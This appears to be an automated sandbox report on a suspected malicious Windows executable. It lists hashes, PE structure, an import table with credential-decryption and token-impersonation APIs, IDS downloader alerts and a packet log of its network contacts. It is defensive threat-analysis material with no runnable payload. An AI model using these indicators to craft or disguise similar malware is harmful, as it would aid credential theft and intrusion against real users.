                                                                                                                                                                                                        Entropy (8bit):7.395550738995465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:djbGP/uGWZmqibNxt/ZtNNjpVjan+hjregKELqJJJYc:1bGP/uJZ7iBxllNjpVjFFLC
                                                                                                                                                                                                        MD5:8D226F80DA462D88E080C6BD6857550C
                                                                                                                                                                                                        SHA1:8F543B99D70FFED51B1BF9C6C33791592AAD04FF
                                                                                                                                                                                                        SHA-256:0AD7054EDB3D096B1D771D9E1FE393B98E11D2320124A1BEF51FFF9704D834E7
                                                                                                                                                                                                        SHA-512:F3CF47989D2BF28F30F7D9867396DF8F270821C6CE298C81A226E943E4E37D194642EA1A192D77FDE9C316B417C4B082B91130A9965C6271B829EA02F895BDC0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:PK..........!.2.oWf...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.0.E......J.(....e.h...4ND.B.....81.$14.. ..{..1...l...w%..=...^i7+...-.d.&.0.A.6.l4...L6.0#...S.O.....X...*..V$:...B~....^.K......../P..I..~7$....i..J&B0Z.Du.t.OJ.K(H.....xG...L.+..v......dc.....W>*..\XR..m.p....Z}.....HwnM.V..n....-..")/..ZwB`.....4........s.DX...j...;A*.....c......4....[.S..9.> ......{.V.4p....W.&....A......|.d.?.......PK..........!.........N......._rels/.rels ...(...........................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                                                        Entropy (8bit):4.630197639605752
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MCGGhQsw1hRUDxodsYEtuBzlSv:MDbyDxDDtu9ov
                                                                                                                                                                                                        MD5:EDAA874791F7CE46170209EA1DE83F6D
                                                                                                                                                                                                        SHA1:660A625B33F56B3E779DEA4E1C206150D7E0587D
                                                                                                                                                                                                        SHA-256:89874501B002834674F67DF4C89260A7669DF85573F81300CC2A68210A52C20E
                                                                                                                                                                                                        SHA-512:BB855C6BE22DF9109B402525F787532936970BEC5CBEABBFB93784F4C39C93E34B641E3E4E732EEBB6D1E9C26A7B82557D015324B6A5B0DFE03BF905FE82164C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............................................................R..P....G...'..Q*........1..1.5...t9".q...H.NXg.@R...G.~..&.a.I.,q.yf.........t...}.j.....Z...=bj
                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.918972299841412
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:#U2800.exe
                                                                                                                                                                                                        File size:26'468'352 bytes
                                                                                                                                                                                                        MD5:95c636b47af9e07f311f711c5328aeb8
                                                                                                                                                                                                        SHA1:f7a8813526b1a4db89c1500bb404ce60815f7693
                                                                                                                                                                                                        SHA256:2660a4d5ea4ef545d592d52b6f6bb5324de87e589d764ff6117271153835f0fd
                                                                                                                                                                                                        SHA512:5dde28e87059f929e881d0a1dd91d0033c4c0db2e7bd1e916929bc4a896bb846341252befce127178faef44920a1c3d83579bed18c4b35c285f528457ee6d2a3
                                                                                                                                                                                                        SSDEEP:393216:vYuSrFTW7yVDu+fUCTDCgJhdYzXUxv+tJG:8FCud1LJhdYzXUxv+t
                                                                                                                                                                                                        TLSH:7247AE14A3E80A66E5BB9734C570C232DAB1BD625735D60F254CF29A1F73B418A2B733
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&...'...&...'...&...'...&...&...&...'...&...&K~.&...'...&...'...&...&...&...'...&o..'...&o..'...&Rich...&.......
                                                                                                                                                                                                        Icon Hash:6796a6a5a3aba4b3
                                                                                                                                                                                                        Entrypoint:0x140081e3c
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x6784D831 [Mon Jan 13 09:09:05 2025 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:cc2c0bdc589a1141f97271fa57395fb5
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                        call 00007F5D412484C4h
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                        jmp 00007F5D41247AA7h
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        jmp 00007F5D41248840h
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                        call 00007F5D4124883Ch
                                                                                                                                                                                                        jmp 00007F5D41247C34h
                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ecx, edx
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                                                        call 00007F5D41247C42h
                                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        mov ebx, dword ptr [eax]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov ebx, edx
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        and ebx, FFFFFFF8h
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        mov ecx, ecx
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        test byte ptr [eax], 00000004h
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                                                        je 00007F5D41247C45h
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                        dec ebp
                                                                                                                                                                                                        arpl word ptr [eax+04h], dx
                                                                                                                                                                                                        neg eax
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        add edx, ecx
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        arpl ax, cx
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        and edx, ecx
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        arpl bx, ax
                                                                                                                                                                                                        dec edx
                                                                                                                                                                                                        mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                        test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                        je 00007F5D41247C3Dh
                                                                                                                                                                                                        movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                        and eax, FFFFFFF0h
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        add ecx, eax
                                                                                                                                                                                                        dec esp
                                                                                                                                                                                                        xor ecx, edx
                                                                                                                                                                                                        dec ecx
                                                                                                                                                                                                        mov ecx, ecx
                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                        jmp 00007F5D41247C4Eh
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        cmp ecx, dword ptr [00000079h]
                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1bffd700x54.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1bffdc40x168.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ce80000x9b16.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c450000xa266c.pdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cf20000x1fac.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1aac1c00x54.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1aac3800x28.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1aac0800x140.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc4b0000xce0.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x8f3b80x8f400fb7a47f718c1bdf57f5b241ec0e3cb9cFalse0.42755201516143104data6.661047620240763IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .managed0x910000x83b1b80x83b200ec334b2c0817b6790896188b7fdcb1fbunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        hydrated0x8cd0000x37df900x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .rdata0xc4b0000xfb796c0xfb7a005c179cb2d95fca15983e52ba7d8d5684unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x1c030000x41d080xd80088154a6493840dc485077ed72d8281d4False0.2808521412037037data5.204782939016406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .pdata0x1c450000xa266c0xa2800b4cf6afdd47b0f5c0c49a70d91b895f9False0.49421424278846154data6.767107170582207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0x1ce80000x9b160x9c00b46c05137f12d0127d4a2632a9083ca5False0.038186097756410256data2.2791871718766177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0x1cf20000x1fac0x200051cc2f70c7b1b8da9783b3a52700717bFalse0.217529296875data5.436726923378399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_ICON0x1ce81300x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.019865461425268027
                                                                                                                                                                                                        RT_GROUP_ICON0x1cf15d80x14data1.15
                                                                                                                                                                                                        RT_VERSION0x1cf15ec0x340data0.42427884615384615
                                                                                                                                                                                                        RT_MANIFEST0x1cf192c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
                                                                                                                                                                                                        bcrypt.dllBCryptGenRandom, BCryptDecrypt, BCryptExportKey, BCryptFinishHash, BCryptGetProperty, BCryptHashData, BCryptImportKey, BCryptImportKeyPair, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyHash, BCryptCreateHash, BCryptDestroyKey, BCryptEncrypt
                                                                                                                                                                                                        CRYPT32.dllCryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
                                                                                                                                                                                                        IPHLPAPI.DLLGetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
                                                                                                                                                                                                        KERNEL32.dllRtlUnwindEx, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleScreenBufferInfo, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, SetConsoleTextAttribute, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, LocalAlloc, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CancelSynchronousIo, CreateIoCompletionPort, CopyFileExW, CreateDirectoryW, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, ExpandEnvironmentStringsW, FindNextFileW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileAttributesExW, GetFileInformationByHandleEx, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, OpenThread, QueryUnbiasedInterruptTime, RemoveDirectoryW, SetFileInformationByHandle, SetFilePointerEx, SetThreadErrorMode, CreateThread, ResumeThread, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, GetCurrentProcessorNumberEx, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, SetEnvironmentVariableW, SetFileAttributesW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, EncodePointer, DecodePointer, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, GetProcessHeap, RtlLookupFunctionEntry
                                                                                                                                                                                                        ncrypt.dllNCryptOpenStorageProvider, NCryptOpenKey, NCryptFreeObject, NCryptDeleteKey, NCryptImportKey, NCryptSetProperty, NCryptGetProperty
                                                                                                                                                                                                        ole32.dllCoGetObjectContext, CoInitializeEx, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, CoGetApartmentType, CoGetContextToken, CoCreateGuid, CLSIDFromProgID, CoWaitForMultipleHandles
                                                                                                                                                                                                        OLEAUT32.dllVariantClear, SysFreeString, SysAllocStringLen
                                                                                                                                                                                                        USER32.dllLoadStringW
                                                                                                                                                                                                        WS2_32.dllWSAIoctl, WSAEventSelect, FreeAddrInfoExW, WSACleanup, WSAStartup, bind, WSARecv, WSAGetOverlappedResult, WSAConnect, shutdown, setsockopt, send, getpeername, getsockopt, select, ioctlsocket, recv, WSASend, closesocket, GetNameInfoW, GetAddrInfoW, FreeAddrInfoW, WSASocketW, GetAddrInfoExW
                                                                                                                                                                                                        api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode, _callnewh, calloc, realloc, malloc
                                                                                                                                                                                                        api-ms-win-crt-math-l1-1-0.dllnanf, fmod, fmodf, __setusermatherr, ceil, cos, exp, floor, log, log10, pow, sin, tan, modf, ceilf, cosf, expf, floorf, logf, powf, sinf, modff, log2, atan2, fma, acosh, asinh, atanh, cosh, sinh, tanh, cbrt, acos, asin, atan, log2f, atan2f, fmaf, acoshf, asinhf, atanhf, coshf, sinhf, tanhf, log10f, cbrtf, acosf, asinf, atanf, tanf, nan
                                                                                                                                                                                                        api-ms-win-crt-string-l1-1-0.dllstrcpy_s, strncpy_s, _stricmp, strcmp, wcsncmp
                                                                                                                                                                                                        api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                                                                        api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, __p___argc, _exit, exit, terminate, _initterm_e, _initterm, _crt_atexit, abort, _get_initial_wide_environment, _initialize_wide_environment, _configure_wide_argv, _c_exit, _set_app_type, _initialize_onexit_table, _seh_filter_exe, _register_onexit_function, _register_thread_local_exe_atexit_callback, _cexit
                                                                                                                                                                                                        api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsscanf, __stdio_common_vsprintf_s, _set_fmode, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
                                                                                                                                                                                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                        DotNetRuntimeDebugHeader10x141c0f920
                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                        2025-01-14T12:40:01.054855+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742172.65.251.78443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.263628+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.280963+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449741142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.284133+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.286112+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.288579+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.293305+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.293535+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449736142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.295847+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.301509+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449734142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:01.375760+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449735142.250.185.206443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.535671+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.539462+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449751142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.542789+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449747142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.547019+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449749142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.548217+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449750142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.550244+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449754142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.550938+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.552046+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449752142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.554431+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449753142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:02.561725+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449748142.250.185.228443TCP
                                                                                                                                                                                                        2025-01-14T12:40:25.481973+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449778172.65.251.78443TCP
                                                                                                                                                                                                        2025-01-14T12:40:27.816717+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449779104.26.13.205443TCP
                                                                                                                                                                                                        2025-01-14T12:40:28.422174+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449780104.26.13.205443TCP
                                                                                                                                                                                                        2025-01-14T12:40:28.896545+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449781208.95.112.180TCP
                                                                                                                                                                                                        2025-01-14T12:40:29.564551+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449782104.26.13.205443TCP
                                                                                                                                                                                                        2025-01-14T12:40:30.197055+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449783104.26.13.205443TCP
                                                                                                                                                                                                        2025-01-14T12:40:30.660328+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449784208.95.112.180TCP
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333136082 CET49732443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333180904 CET44349732142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333286047 CET49732443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333380938 CET49733443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333473921 CET44349733142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333573103 CET49733443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333838940 CET49735443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333863020 CET44349735142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333889961 CET49734443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333897114 CET44349734142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333961964 CET49736443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333966970 CET49735443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.333990097 CET44349736142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334036112 CET49736443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334181070 CET49737443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334304094 CET44349737142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334357977 CET49734443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334374905 CET49737443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334404945 CET49738443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.334413052 CET44349738142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.335263968 CET49739443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.335274935 CET49738443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.335349083 CET44349739142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.336139917 CET49739443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.352130890 CET49739443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.352174044 CET44349739142.250.185.206192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.352217913 CET49738443192.168.2.4142.250.185.206
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.352235079 CET44349738142.250.185.206192.168.2.4
